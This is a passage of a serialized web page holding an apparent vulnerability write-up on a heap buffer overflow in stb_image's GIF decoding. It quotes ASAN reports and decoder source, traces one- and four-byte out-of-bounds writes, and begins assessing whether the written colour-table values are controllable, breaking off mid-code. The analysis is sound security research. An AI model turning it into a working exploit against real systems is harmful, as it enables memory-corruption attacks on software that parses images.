stb/stb_image.h:989\n    #23 0x6554242fc927 in stbi__load_and_postprocess_8bit stb/stb_image.h:1088\n    #24 0x6554242fd34f in stbi_load_from_file stb/stb_image.h:1174\n    #25 0x6554242fd22c in stbi_load stb/stb_image.h:1164\n    [...]\n",[147382],{"type":28,"tag":98,"props":147383,"children":147384},{"__ignoreMap":7},[147385],{"type":33,"value":147380},{"type":28,"tag":443,"props":147387,"children":147389},{"id":147388},"investigating-the-finding",[147390],{"type":33,"value":147391},"Investigating the Finding",{"type":28,"tag":29,"props":147393,"children":147394},{},[147395,147397,147403,147404,147409],{"type":33,"value":147396},"The ASAN output shows that at line ",{"type":28,"tag":98,"props":147398,"children":147400},{"className":147399},[],[147401],{"type":33,"value":147402},"6233",{"type":33,"value":142903},{"type":28,"tag":98,"props":147405,"children":147407},{"className":147406},[],[147408],{"type":33,"value":146936},{"type":33,"value":147410}," an attempt was made to write a single byte out-of-bounds. Looking at the nearby source:",{"type":28,"tag":234,"props":147412,"children":147414},{"code":147413,"language":1797,"meta":7,"className":16176,"style":7},"static void stbi__out_gif_code(stbi__gif *g, stbi__uint16 code)\n{\n   stbi_uc *p, *c;\n   int idx; \n\n   [...]\n\n   if (g->cur_y >= g->max_y) return;\n\n   idx = g->cur_x + g->cur_y; \n   p = &g->out[idx];\n   g->history[idx / 4] = 1;          // OOB write\n",[147415],{"type":28,"tag":98,"props":147416,"children":147417},{"__ignoreMap":7},[147418,147460,147467,147493,147506,147513,147521,147528,147582,147589,147635,147668],{"type":28,"tag":116,"props":147419,"children":147420},{"class":245,"line":246},[147421,147425,147429,147434,147439,147443,147447,147452,147456],{"type":28,"tag":116,"props":147422,"children":147423},{"style":376},[147424],{"type":33,"value":50664},{"type":28,"tag":116,"props":147426,"children":147427},{"style":376},[147428],{"type":33,"value":2169},{"type":28,"tag":116,"props":147430,"children":147431},{"style":282},[147432],{"type":33,"value":147433}," stbi__out_gif_code",{"type":28,"tag":116,"props":147435,"children":147436},{"style":266},[147437],{"type":33,"value":147438},"(stbi__gif ",{"type":28,"tag":116,"props":147440,"children":147441},{"style":370},[147442],{"type":33,"value":4240},{"type":28,"tag":116,"props":147444,"children":147445},{"style":272},[147446],{"type":33,"value":108911},{"type":28,"tag":116,"props":147448,"children":147449},{"style":266},[147450],{"type":33,"value":147451},", stbi__uint16 ",{"type":28,"tag":116,"props":147453,"children":147454},{"style":272},[147455],{"type":33,"value":98},{"type":28,"tag":116,"props":147457,"children":147458},{"style":266},[147459],{"type":33,"value":2830},{"type":28,"tag":116,"props":147461,"children":147462},{"class":245,"line":256},[147463],{"type":28,"tag":116,"props":147464,"children":147465},{"style":266},[147466],{"type":33,"value":10547},{"type":28,"tag":116,"props":147468,"children":147469},{"class":245,"line":293},[147470,147475,147479,147484,147488],{"type":28,"tag":116,"props":147471,"children":147472},{"style":266},[147473],{"type":33,"value":147474},"   stbi_uc ",{"type":28,"tag":116,"props":147476,"children":147477},{"style":370},[147478],{"type":33,"value":4240},{"type":28,"tag":116,"props":147480,"children":147481},{"style":266},[147482],{"type":33,"value":147483},"p, ",{"type":28,"tag":116,"props":147485,"children":147486},{"style":370},[147487],{"type":33,"value":4240},{"type":28,"tag":116,"props":147489,"children":147490},{"style":266},[147491],{"type":33,"value":147492},"c;\n",{"type":28,"tag":116,"props":147494,"children":147495},{"class":245,"line":361},[147496,147501],{"type":28,"tag":116,"props":147497,"children":147498},{"style":376},[147499],{"type":33,"value":147500},"   int",{"type":28,"tag":116,"props":147502,"children":147503},{"style":266},[147504],{"type":33,"value":147505}," idx; \n",{"type":28,"tag":116,"props":147507,"children":147508},{"class":245,"line":387},[147509],{"type":28,"tag":116,"props":147510,"children":147511},{"emptyLinePlaceholder":19},[147512],{"type":33,"value":1044},{"type":28,"tag":116,"props":147514,"children":147515},{"class":245,"line":400},[147516],{"type":28,"tag":116,"props":147517,"children":147518},{"style":266},[147519],{"type":33,"value":147520},"   [...]\n",{"type":28,"tag":116,"props":147522,"children":147523},{"class":245,"line":614},[147524],{"type":28,"tag":116,"props":147525,"children":147526},{"emptyLinePlaceholder":19},[147527],{"type":33,"value":1044},{"type":28,"tag":116,"props":147529,"children":147530},{"class":245,"line":631},[147531,147535,147539,147543,147547,147552,147556,147561,147565,147570,147574,147578],{"type":28,"tag":116,"props":147532,"children":147533},{"style":260},[147534],{"type":33,"value":52262},{"type":28,"tag":116,"props":147536,"children":147537},{"style":266},[147538],{"type":33,"value":269},{"type":28,"tag":116,"props":147540,"children":147541},{"style":272},[147542],{"type":33,"value":108911},{"type":28,"tag":116,"props":147544,"children":147545},{"style":266},[147546],{"type":33,"value":13423},{"type":28,"tag":116,"props":147548,"children":147549},{"style":272},[147550],{"type":33,"value":147551},"cur_y",{"type":28,"tag":116,"props":147553,"children":147554},{"style":370},[147555],{"type":33,"value":7974},{"type":28,"tag":116,"props":147557,"children":147558},{"style":272},[147559],{"type":33,"value":147560}," g",{"type":28,"tag":116,"props":147562,"children":147563},{"style":266},[147564],{"type":33,"value":13423},{"type":28,"tag":116,"props":147566,"children":147567},{"style":272},[147568],{"type":33,"value":147569},"max_y",{"type":28,"tag":116,"props":147571,"children":147572},{"style":266},[147573],{"type":33,"value":1609},{"type":28,"tag":116,"props":147575,"children":147576},{"style":260},[147577],{"type":33,"value":48078},{"type":28,"tag":116,"props":147579,"children":147580},{"style":266},[147581],{"type":33,"value":384},{"type":28,"tag":116,"props":147583,"children":147584},{"class":245,"line":665},[147585],{"type":28,"tag":116,"props":147586,"children":147587},{"emptyLinePlaceholder":19},[147588],{"type":33,"value":1044},{"type":28,"tag":116,"props":147590,"children":147591},{"class":245,"line":713},[147592,147597,147601,147605,147609,147614,147618,147622,147626,147630],{"type":28,"tag":116,"props":147593,"children":147594},{"style":266},[147595],{"type":33,"value":147596},"   idx ",{"type":28,"tag":116,"props":147598,"children":147599},{"style":370},[147600],{"type":33,"value":373},{"type":28,"tag":116,"props":147602,"children":147603},{"style":272},[147604],{"type":33,"value":147560},{"type":28,"tag":116,"props":147606,"children":147607},{"style":266},[147608],{"type":33,"value":13423},{"type":28,"tag":116,"props":147610,"children":147611},{"style":272},[147612],{"type":33,"value":147613},"cur_x",{"type":28,"tag":116,"props":147615,"children":147616},{"style":370},[147617],{"type":33,"value":2258},{"type":28,"tag":116,"props":147619,"children":147620},{"style":272},[147621],{"type":33,"value":147560},{"type":28,"tag":116,"props":147623,"children":147624},{"style":266},[147625],{"type":33,"value":13423},{"type":28,"tag":116,"props":147627,"children":147628},{"style":272},[147629],{"type":33,"value":147551},{"type":28,"tag":116,"props":147631,"children":147632},{"style":266},[147633],{"type":33,"value":147634},"; \n",{"type":28,"tag":116,"props":147636,"children":147637},{"class":245,"line":750},[147638,147643,147647,147651,147655,147659,147663],{"type":28,"tag":116,"props":147639,"children":147640},{"style":266},[147641],{"type":33,"value":147642},"   p ",{"type":28,"tag":116,"props":147644,"children":147645},{"style":370},[147646],{"type":33,"value":373},{"type":28,"tag":116,"props":147648,"children":147649},{"style":370},[147650],{"type":33,"value":6813},{"type":28,"tag":116,"props":147652,"children":147653},{"style":272},[147654],{"type":33,"value":108911},{"type":28,"tag":116,"props":147656,"children":147657},{"style":266},[147658],{"type":33,"value":13423},{"type":28,"tag":116,"props":147660,"children":147661},{"style":272},[147662],{"type":33,"value":118334},{"type":28,"tag":116,"props":147664,"children":147665},{"style":266},[147666],{"type":33,"value":147667},"[idx];\n",{"type":28,"tag":116,"props":147669,"children":147670},{"class":245,"line":779},[147671,147676,147680,147685,147690,147694,147698,147702,147706,147710,147714],{"type":28,"tag":116,"props":147672,"children":147673},{"style":272},[147674],{"type":33,"value":147675},"   g",{"type":28,"tag":116,"props":147677,"children":147678},{"style":266},[147679],{"type":33,"value":13423},{"type":28,"tag":116,"props":147681,"children":147682},{"style":272},[147683],{"type":33,"value":147684},"history",{"type":28,"tag":116,"props":147686,"children":147687},{"style":266},[147688],{"type":33,"value":147689},"[idx ",{"type":28,"tag":116,"props":147691,"children":147692},{"style":370},[147693],{"type":33,"value":4250},{"type":28,"tag":116,"props":147695,"children":147696},{"style":350},[147697],{"type":33,"value":11413},{"type":28,"tag":116,"props":147699,"children":147700},{"style":266},[147701],{"type":33,"value":8333},{"type":28,"tag":116,"props":147703,"children":147704},{"style":370},[147705],{"type":33,"value":373},{"type":28,"tag":116,"props":147707,"children":147708},{"style":350},[147709],{"type":33,"value":4192},{"type":28,"tag":116,"props":147711,"children":147712},{"style":266},[147713],{"type":33,"value":48695},{"type":28,"tag":116,"props":147715,"children":147716},{"style":250},[147717],{"type":33,"value":147718},"          // OOB write\n",{"type":28,"tag":29,"props":147720,"children":147721},{},[147722,147724,147729,147731,147737,147739,147745],{"type":33,"value":147723},"It’s reasonable to assume ",{"type":28,"tag":98,"props":147725,"children":147727},{"className":147726},[],[147728],{"type":33,"value":76137},{"type":33,"value":147730}," is outside the bounds of ",{"type":28,"tag":98,"props":147732,"children":147734},{"className":147733},[],[147735],{"type":33,"value":147736},"g->history",{"type":33,"value":147738},", which leads to a one-byte OOB write (",{"type":28,"tag":98,"props":147740,"children":147742},{"className":147741},[],[147743],{"type":33,"value":147744},"g->history[idx / 4] = 1",{"type":33,"value":147746},"). That single-byte OOB is hard to exploit remotely, but it was the only corruption observed initially, so we investigated further.",{"type":28,"tag":29,"props":147748,"children":147749},{},[147750,147752,147757,147759,147765,147767,147772,147774,147780,147782,147788],{"type":33,"value":147751},"Because ",{"type":28,"tag":98,"props":147753,"children":147755},{"className":147754},[],[147756],{"type":33,"value":29},{"type":33,"value":147758}," is computed from ",{"type":28,"tag":98,"props":147760,"children":147762},{"className":147761},[],[147763],{"type":33,"value":147764},"g->out[idx]",{"type":33,"value":147766}," immediately before the violation, we considered whether ",{"type":28,"tag":98,"props":147768,"children":147770},{"className":147769},[],[147771],{"type":33,"value":76137},{"type":33,"value":147773}," could also be OOB for ",{"type":28,"tag":98,"props":147775,"children":147777},{"className":147776},[],[147778],{"type":33,"value":147779},"g->out",{"type":33,"value":147781},". Note that computing the address ",{"type":28,"tag":98,"props":147783,"children":147785},{"className":147784},[],[147786],{"type":33,"value":147787},"&g->out[idx]",{"type":33,"value":147789}," does not itself access the memory, so ASAN wouldn’t flag it.",{"type":28,"tag":29,"props":147791,"children":147792},{},[147793,147795,147800],{"type":33,"value":147794},"If we comment out ",{"type":28,"tag":98,"props":147796,"children":147798},{"className":147797},[],[147799],{"type":33,"value":147744},{"type":33,"value":147801}," and re-run the fuzzing input, ASAN reports another violation in the same function at a different line:",{"type":28,"tag":234,"props":147803,"children":147805},{"code":147804},"=================================================================\n==8578==ERROR: AddressSanitizer: heap-buffer-overflow on address ...\nWRITE of size 1 at 0x7f0fe6e6c800 thread T0\n    #0 0x5d54e32a4315 in stbi__out_gif_code stb/stb_image.h:6237\n    [...]\n",[147806],{"type":28,"tag":98,"props":147807,"children":147808},{"__ignoreMap":7},[147809],{"type":33,"value":147804},{"type":28,"tag":29,"props":147811,"children":147812},{},[147813],{"type":33,"value":147814},"This corresponds to:",{"type":28,"tag":234,"props":147816,"children":147818},{"code":147817,"language":1797,"meta":7,"className":16176,"style":7},"static void stbi__out_gif_code(stbi__gif *g, stbi__uint16 code)\n{\n   [...]\n\n   idx = g->cur_x + g->cur_y; \n   p = &g->out[idx];\n   g->history[idx / 4] = 1;  \n\n   c = &g->color_table[g->codes[code].suffix * 4];\n   if (c[3] > 128) {\n      p[0] = c[2];        // OOB write\n      p[1] = c[1];\n      p[2] = c[0];\n      p[3] = c[3];\n   }\n",[147819],{"type":28,"tag":98,"props":147820,"children":147821},{"__ignoreMap":7},[147822,147861,147868,147875,147882,147925,147956,148000,148007,148075,148115,148160,148199,148238,148277],{"type":28,"tag":116,"props":147823,"children":147824},{"class":245,"line":246},[147825,147829,147833,147837,147841,147845,147849,147853,147857],{"type":28,"tag":116,"props":147826,"children":147827},{"style":376},[147828],{"type":33,"value":50664},{"type":28,"tag":116,"props":147830,"children":147831},{"style":376},[147832],{"type":33,"value":2169},{"type":28,"tag":116,"props":147834,"children":147835},{"style":282},[147836],{"type":33,"value":147433},{"type":28,"tag":116,"props":147838,"children":147839},{"style":266},[147840],{"type":33,"value":147438},{"type":28,"tag":116,"props":147842,"children":147843},{"style":370},[147844],{"type":33,"value":4240},{"type":28,"tag":116,"props":147846,"children":147847},{"style":272},[147848],{"type":33,"value":108911},{"type":28,"tag":116,"props":147850,"children":147851},{"style":266},[147852],{"type":33,"value":147451},{"type":28,"tag":116,"props":147854,"children":147855},{"style":272},[147856],{"type":33,"value":98},{"type":28,"tag":116,"props":147858,"children":147859},{"style":266},[147860],{"type":33,"value":2830},{"type":28,"tag":116,"props":147862,"children":147863},{"class":245,"line":256},[147864],{"type":28,"tag":116,"props":147865,"children":147866},{"style":266},[147867],{"type":33,"value":10547},{"type":28,"tag":116,"props":147869,"children":147870},{"class":245,"line":293},[147871],{"type":28,"tag":116,"props":147872,"children":147873},{"style":266},[147874],{"type":33,"value":147520},{"type":28,"tag":116,"props":147876,"children":147877},{"class":245,"line":361},[147878],{"type":28,"tag":116,"props":147879,"children":147880},{"emptyLinePlaceholder":19},[147881],{"type":33,"value":1044},{"type":28,"tag":116,"props":147883,"children":147884},{"class":245,"line":387},[147885,147889,147893,147897,147901,147905,147909,147913,147917,147921],{"type":28,"tag":116,"props":147886,"children":147887},{"style":266},[147888],{"type":33,"value":147596},{"type":28,"tag":116,"props":147890,"children":147891},{"style":370},[147892],{"type":33,"value":373},{"type":28,"tag":116,"props":147894,"children":147895},{"style":272},[147896],{"type":33,"value":147560},{"type":28,"tag":116,"props":147898,"children":147899},{"style":266},[147900],{"type":33,"value":13423},{"type":28,"tag":116,"props":147902,"children":147903},{"style":272},[147904],{"type":33,"value":147613},{"type":28,"tag":116,"props":147906,"children":147907},{"style":370},[147908],{"type":33,"value":2258},{"type":28,"tag":116,"props":147910,"children":147911},{"style":272},[147912],{"type":33,"value":147560},{"type":28,"tag":116,"props":147914,"children":147915},{"style":266},[147916],{"type":33,"value":13423},{"type":28,"tag":116,"props":147918,"children":147919},{"style":272},[147920],{"type":33,"value":147551},{"type":28,"tag":116,"props":147922,"children":147923},{"style":266},[147924],{"type":33,"value":147634},{"type":28,"tag":116,"props":147926,"children":147927},{"class":245,"line":400},[147928,147932,147936,147940,147944,147948,147952],{"type":28,"tag":116,"props":147929,"children":147930},{"style":266},[147931],{"type":33,"value":147642},{"type":28,"tag":116,"props":147933,"children":147934},{"style":370},[147935],{"type":33,"value":373},{"type":28,"tag":116,"props":147937,"children":147938},{"style":370},[147939],{"type":33,"value":6813},{"type":28,"tag":116,"props":147941,"children":147942},{"style":272},[147943],{"type":33,"value":108911},{"type":28,"tag":116,"props":147945,"children":147946},{"style":266},[147947],{"type":33,"value":13423},{"type":28,"tag":116,"props":147949,"children":147950},{"style":272},[147951],{"type":33,"value":118334},{"type":28,"tag":116,"props":147953,"children":147954},{"style":266},[147955],{"type":33,"value":147667},{"type":28,"tag":116,"props":147957,"children":147958},{"class":245,"line":614},[147959,147963,147967,147971,147975,147979,147983,147987,147991,147995],{"type":28,"tag":116,"props":147960,"children":147961},{"style":272},[147962],{"type":33,"value":147675},{"type":28,"tag":116,"props":147964,"children":147965},{"style":266},[147966],{"type":33,"value":13423},{"type":28,"tag":116,"props":147968,"children":147969},{"style":272},[147970],{"type":33,"value":147684},{"type":28,"tag":116,"props":147972,"children":147973},{"style":266},[147974],{"type":33,"value":147689},{"type":28,"tag":116,"props":147976,"children":147977},{"style":370},[147978],{"type":33,"value":4250},{"type":28,"tag":116,"props":147980,"children":147981},{"style":350},[147982],{"type":33,"value":11413},{"type":28,"tag":116,"props":147984,"children":147985},{"style":266},[147986],{"type":33,"value":8333},{"type":28,"tag":116,"props":147988,"children":147989},{"style":370},[147990],{"type":33,"value":373},{"type":28,"tag":116,"props":147992,"children":147993},{"style":350},[147994],{"type":33,"value":4192},{"type":28,"tag":116,"props":147996,"children":147997},{"style":266},[147998],{"type":33,"value":147999},";  \n",{"type":28,"tag":116,"props":148001,"children":148002},{"class":245,"line":631},[148003],{"type":28,"tag":116,"props":148004,"children":148005},{"emptyLinePlaceholder":19},[148006],{"type":33,"value":1044},{"type":28,"tag":116,"props":148008,"children":148009},{"class":245,"line":665},[148010,148015,148019,148023,148027,148031,148036,148040,148044,148048,148053,148058,148063,148067,148071],{"type":28,"tag":116,"props":148011,"children":148012},{"style":266},[148013],{"type":33,"value":148014},"   c ",{"type":28,"tag":116,"props":148016,"children":148017},{"style":370},[148018],{"type":33,"value":373},{"type":28,"tag":116,"props":148020,"children":148021},{"style":370},[148022],{"type":33,"value":6813},{"type":28,"tag":116,"props":148024,"children":148025},{"style":272},[148026],{"type":33,"value":108911},{"type":28,"tag":116,"props":148028,"children":148029},{"style":266},[148030],{"type":33,"value":13423},{"type":28,"tag":116,"props":148032,"children":148033},{"style":272},[148034],{"type":33,"value":148035},"color_table",{"type":28,"tag":116,"props":148037,"children":148038},{"style":266},[148039],{"type":33,"value":347},{"type":28,"tag":116,"props":148041,"children":148042},{"style":272},[148043],{"type":33,"value":108911},{"type":28,"tag":116,"props":148045,"children":148046},{"style":266},[148047],{"type":33,"value":13423},{"type":28,"tag":116,"props":148049,"children":148050},{"style":272},[148051],{"type":33,"value":148052},"codes",{"type":28,"tag":116,"props":148054,"children":148055},{"style":266},[148056],{"type":33,"value":148057},"[code].",{"type":28,"tag":116,"props":148059,"children":148060},{"style":272},[148061],{"type":33,"value":148062},"suffix",{"type":28,"tag":116,"props":148064,"children":148065},{"style":370},[148066],{"type":33,"value":9484},{"type":28,"tag":116,"props":148068,"children":148069},{"style":350},[148070],{"type":33,"value":11413},{"type":28,"tag":116,"props":148072,"children":148073},{"style":266},[148074],{"type":33,"value":31223},{"type":28,"tag":116,"props":148076,"children":148077},{"class":245,"line":713},[148078,148082,148086,148090,148094,148098,148102,148106,148111],{"type":28,"tag":116,"props":148079,"children":148080},{"style":260},[148081],{"type":33,"value":52262},{"type":28,"tag":116,"props":148083,"children":148084},{"style":266},[148085],{"type":33,"value":269},{"type":28,"tag":116,"props":148087,"children":148088},{"style":272},[148089],{"type":33,"value":1797},{"type":28,"tag":116,"props":148091,"children":148092},{"style":266},[148093],{"type":33,"value":347},{"type":28,"tag":116,"props":148095,"children":148096},{"style":350},[148097],{"type":33,"value":16957},{"type":28,"tag":116,"props":148099,"children":148100},{"style":266},[148101],{"type":33,"value":8333},{"type":28,"tag":116,"props":148103,"children":148104},{"style":370},[148105],{"type":33,"value":645},{"type":28,"tag":116,"props":148107,"children":148108},{"style":350},[148109],{"type":33,"value":148110}," 128",{"type":28,"tag":116,"props":148112,"children":148113},{"style":266},[148114],{"type":33,"value":844},{"type":28,"tag":116,"props":148116,"children":148117},{"class":245,"line":750},[148118,148123,148127,148131,148135,148139,148143,148147,148151,148155],{"type":28,"tag":116,"props":148119,"children":148120},{"style":272},[148121],{"type":33,"value":148122},"      p",{"type":28,"tag":116,"props":148124,"children":148125},{"style":266},[148126],{"type":33,"value":347},{"type":28,"tag":116,"props":148128,"children":148129},{"style":350},[148130],{"type":33,"value":353},{"type":28,"tag":116,"props":148132,"children":148133},{"style":266},[148134],{"type":33,"value":8333},{"type":28,"tag":116,"props":148136,"children":148137},{"style":370},[148138],{"type":33,"value":373},{"type":28,"tag":116,"props":148140,"children":148141},{"style":272},[148142],{"type":33,"value":1740},{"type":28,"tag":116,"props":148144,"children":148145},{"style":266},[148146],{"type":33,"value":347},{"type":28,"tag":116,"props":148148,"children":148149},{"style":350},[148150],{"type":33,"value":2794},{"type":28,"tag":116,"props":148152,"children":148153},{"style":266},[148154],{"type":33,"value":55530},{"type":28,"tag":116,"props":148156,"children":148157},{"style":250},[148158],{"type":33,"value":148159},"        // OOB write\n",{"type":28,"tag":116,"props":148161,"children":148162},{"class":245,"line":779},[148163,148167,148171,148175,148179,148183,148187,148191,148195],{"type":28,"tag":116,"props":148164,"children":148165},{"style":272},[148166],{"type":33,"value":148122},{"type":28,"tag":116,"props":148168,"children":148169},{"style":266},[148170],{"type":33,"value":347},{"type":28,"tag":116,"props":148172,"children":148173},{"style":350},[148174],{"type":33,"value":1824},{"type":28,"tag":116,"props":148176,"children":148177},{"style":266},[148178],{"type":33,"value":8333},{"type":28,"tag":116,"props":148180,"children":148181},{"style":370},[148182],{"type":33,"value":373},{"type":28,"tag":116,"props":148184,"children":148185},{"style":272},[148186],{"type":33,"value":1740},{"type":28,"tag":116,"props":148188,"children":148189},{"style":266},[148190],{"type":33,"value":347},{"type":28,"tag":116,"props":148192,"children":148193},{"style":350},[148194],{"type":33,"value":1824},{"type":28,"tag":116,"props":148196,"children":148197},{"style":266},[148198],{"type":33,"value":31223},{"type":28,"tag":116,"props":148200,"children":148201},{"class":245,"line":796},[148202,148206,148210,148214,148218,148222,148226,148230,148234],{"type":28,"tag":116,"props":148203,"children":148204},{"style":272},[148205],{"type":33,"value":148122},{"type":28,"tag":116,"props":148207,"children":148208},{"style":266},[148209],{"type":33,"value":347},{"type":28,"tag":116,"props":148211,"children":148212},{"style":350},[148213],{"type":33,"value":2794},{"type":28,"tag":116,"props":148215,"children":148216},{"style":266},[148217],{"type":33,"value":8333},{"type":28,"tag":116,"props":148219,"children":148220},{"style":370},[148221],{"type":33,"value":373},{"type":28,"tag":116,"props":148223,"children":148224},{"style":272},[148225],{"type":33,"value":1740},{"type":28,"tag":116,"props":148227,"children":148228},{"style":266},[148229],{"type":33,"value":347},{"type":28,"tag":116,"props":148231,"children":148232},{"style":350},[148233],{"type":33,"value":353},{"type":28,"tag":116,"props":148235,"children":148236},{"style":266},[148237],{"type":33,"value":31223},{"type":28,"tag":116,"props":148239,"children":148240},{"class":245,"line":847},[148241,148245,148249,148253,148257,148261,148265,148269,148273],{"type":28,"tag":116,"props":148242,"children":148243},{"style":272},[148244],{"type":33,"value":148122},{"type":28,"tag":116,"props":148246,"children":148247},{"style":266},[148248],{"type":33,"value":347},{"type":28,"tag":116,"props":148250,"children":148251},{"style":350},[148252],{"type":33,"value":16957},{"type":28,"tag":116,"props":148254,"children":148255},{"style":266},[148256],{"type":33,"value":8333},{"type":28,"tag":116,"props":148258,"children":148259},{"style":370},[148260],{"type":33,"value":373},{"type":28,"tag":116,"props":148262,"children":148263},{"style":272},[148264],{"type":33,"value":1740},{"type":28,"tag":116,"props":148266,"children":148267},{"style":266},[148268],{"type":33,"value":347},{"type":28,"tag":116,"props":148270,"children":148271},{"style":350},[148272],{"type":33,"value":16957},{"type":28,"tag":116,"props":148274,"children":148275},{"style":266},[148276],{"type":33,"value":31223},{"type":28,"tag":116,"props":148278,"children":148279},{"class":245,"line":898},[148280],{"type":28,"tag":116,"props":148281,"children":148282},{"style":266},[148283],{"type":33,"value":34377},{"type":28,"tag":29,"props":148285,"children":148286},{},[148287,148289,148294,148296,148301],{"type":33,"value":148288},"This confirms ",{"type":28,"tag":98,"props":148290,"children":148292},{"className":148291},[],[148293],{"type":33,"value":76137},{"type":33,"value":148295}," is OOB for ",{"type":28,"tag":98,"props":148297,"children":148299},{"className":148298},[],[148300],{"type":33,"value":147779},{"type":33,"value":148302}," as well - here it results in a four-byte OOB write. A four-byte OOB write is still not trivial to exploit remotely, but it is meaningfully more dangerous than a single-byte OOB.",{"type":28,"tag":29,"props":148304,"children":148305},{},[148306,148308,148314,148316,148323],{"type":33,"value":148307},"We've read through the GIF parsing code to find out if the written values can be controlled, and found that ",{"type":28,"tag":98,"props":148309,"children":148311},{"className":148310},[],[148312],{"type":33,"value":148313},"g->color_table",{"type":33,"value":148315}," is populated by ",{"type":28,"tag":87,"props":148317,"children":148320},{"href":148318,"rel":148319},"https://github.com/nothings/stb/blob/f1f077b2722f55e158cba020f0312ee2d13c463a/stb_image.h#L6166-L6175",[91],[148321],{"type":33,"value":148322},"stbi__gif_parse_colortable",{"type":33,"value":4160},{"type":28,"tag":234,"props":148325,"children":148327},{"code":148326,"language":1797,"meta":7,"className":16176,"style":7},"static void stbi__gif_parse_colortable(\n    stbi__context *s,\n    stbi_uc pal[256][4],    // g->color_table\n    int num_entries,\n    int transp\n) {\n   int i;\n   for (i=0; i \u003C num_entries; ++i) {\n      pal[i][2] = stbi__get8(s);\n      pal[i][1] = stbi__get8(s);\n      pal[i][0] = stbi__get8(s);\n      pal[i][3] = transp == i ? 0 : 255;\n   }\n}\n",[148328],{"type":28,"tag":98,"props":148329,"children":148330},{"__ignoreMap":7},[148331,148351,148371,148410,148426,148438,148445,148456,148499,148533,148564,148595,148652,148659],{"type":28,"tag":116,"props":148332,"children":148333},{"class":245,"line":246},[148334,148338,148342,148347],{"type":28,"tag":116,"props":148335,"children":148336},{"style":376},[148337],{"type":33,"value":50664},{"type":28,"tag":116,"props":148339,"children":148340},{"style":376},[148341],{"type":33,"value":2169},{"type":28,"tag":116,"props":148343,"children":148344},{"style":282},[148345],{"type":33,"value":148346}," stbi__gif_parse_colortable",{"type":28,"tag":116,"props":148348,"children":148349},{"style":266},[148350],{"type":33,"value":3133},{"type":28,"tag":116,"props":148352,"children":148353},{"class":245,"line":256},[148354,148359,148363,148367],{"type":28,"tag":116,"props":148355,"children":148356},{"style":266},[148357],{"type":33,"value":148358},"    stbi__context ",{"type":28,"tag":116,"props":148360,"children":148361},{"style":370},[148362],{"type":33,"value":4240},{"type":28,"tag":116,"props":148364,"children":148365},{"style":272},[148366],{"type":33,"value":10318},{"type":28,"tag":116,"props":148368,"children":148369},{"style":266},[148370],{"type":33,"value":3178},{"type":28,"tag":116,"props":148372,"children":148373},{"class":245,"line":293},[148374,148379,148384,148388,148392,148396,148400,148405],{"type":28,"tag":116,"props":148375,"children":148376},{"style":266},[148377],{"type":33,"value":148378},"    stbi_uc ",{"type":28,"tag":116,"props":148380,"children":148381},{"style":272},[148382],{"type":33,"value":148383},"pal",{"type":28,"tag":116,"props":148385,"children":148386},{"style":266},[148387],{"type":33,"value":347},{"type":28,"tag":116,"props":148389,"children":148390},{"style":350},[148391],{"type":33,"value":92911},{"type":28,"tag":116,"props":148393,"children":148394},{"style":266},[148395],{"type":33,"value":48579},{"type":28,"tag":116,"props":148397,"children":148398},{"style":350},[148399],{"type":33,"value":17190},{"type":28,"tag":116,"props":148401,"children":148402},{"style":266},[148403],{"type":33,"value":148404},"],",{"type":28,"tag":116,"props":148406,"children":148407},{"style":250},[148408],{"type":33,"value":148409},"    // g->color_table\n",{"type":28,"tag":116,"props":148411,"children":148412},{"class":245,"line":361},[148413,148417,148422],{"type":28,"tag":116,"props":148414,"children":148415},{"style":376},[148416],{"type":33,"value":18740},{"type":28,"tag":116,"props":148418,"children":148419},{"style":272},[148420],{"type":33,"value":148421}," num_entries",{"type":28,"tag":116,"props":148423,"children":148424},{"style":266},[148425],{"type":33,"value":3178},{"type":28,"tag":116,"props":148427,"children":148428},{"class":245,"line":387},[148429,148433],{"type":28,"tag":116,"props":148430,"children":148431},{"style":376},[148432],{"type":33,"value":18740},{"type":28,"tag":116,"props":148434,"children":148435},{"style":266},[148436],{"type":33,"value":148437}," transp\n",{"type":28,"tag":116,"props":148439,"children":148440},{"class":245,"line":400},[148441],{"type":28,"tag":116,"props":148442,"children":148443},{"style":266},[148444],{"type":33,"value":844},{"type":28,"tag":116,"props":148446,"children":148447},{"class":245,"line":614},[148448,148452],{"type":28,"tag":116,"props":148449,"children":148450},{"style":376},[148451],{"type":33,"value":147500},{"type":28,"tag":116,"props":148453,"children":148454},{"style":266},[148455],{"type":33,"value":57582},{"type":28,"tag":116,"props":148457,"children":148458},{"class":245,"line":631},[148459,148464,148469,148473,148477,148481,148485,148490,148494],{"type":28,"tag":116,"props":148460,"children":148461},{"style":260},[148462],{"type":33,"value":148463},"   for",{"type":28,"tag":116,"props":148465,"children":148466},{"style":266},[148467],{"type":33,"value":148468}," (i",{"type":28,"tag":116,"props":148470,"children":148471},{"style":370},[148472],{"type":33,"value":373},{"type":28,"tag":116,"props":148474,"children":148475},{"style":350},[148476],{"type":33,"value":353},{"type":28,"tag":116,"props":148478,"children":148479},{"style":266},[148480],{"type":33,"value":50852},{"type":28,"tag":116,"props":148482,"children":148483},{"style":370},[148484],{"type":33,"value":514},{"type":28,"tag":116,"props":148486,"children":148487},{"style":266},[148488],{"type":33,"value":148489}," num_entries; ",{"type":28,"tag":116,"props":148491,"children":148492},{"style":370},[148493],{"type":33,"value":50888},{"type":28,"tag":116,"props":148495,"children":148496},{"style":266},[148497],{"type":33,"value":148498},"i) {\n",{"type":28,"tag":116,"props":148500,"children":148501},{"class":245,"line":665},[148502,148507,148511,148515,148519,148523,148528],{"type":28,"tag":116,"props":148503,"children":148504},{"style":272},[148505],{"type":33,"value":148506},"      pal",{"type":28,"tag":116,"props":148508,"children":148509},{"style":266},[148510],{"type":33,"value":60273},{"type":28,"tag":116,"props":148512,"children":148513},{"style":350},[148514],{"type":33,"value":2794},{"type":28,"tag":116,"props":148516,"children":148517},{"style":266},[148518],{"type":33,"value":8333},{"type":28,"tag":116,"props":148520,"children":148521},{"style":370},[148522],{"type":33,"value":373},{"type":28,"tag":116,"props":148524,"children":148525},{"style":282},[148526],{"type":33,"value":148527}," 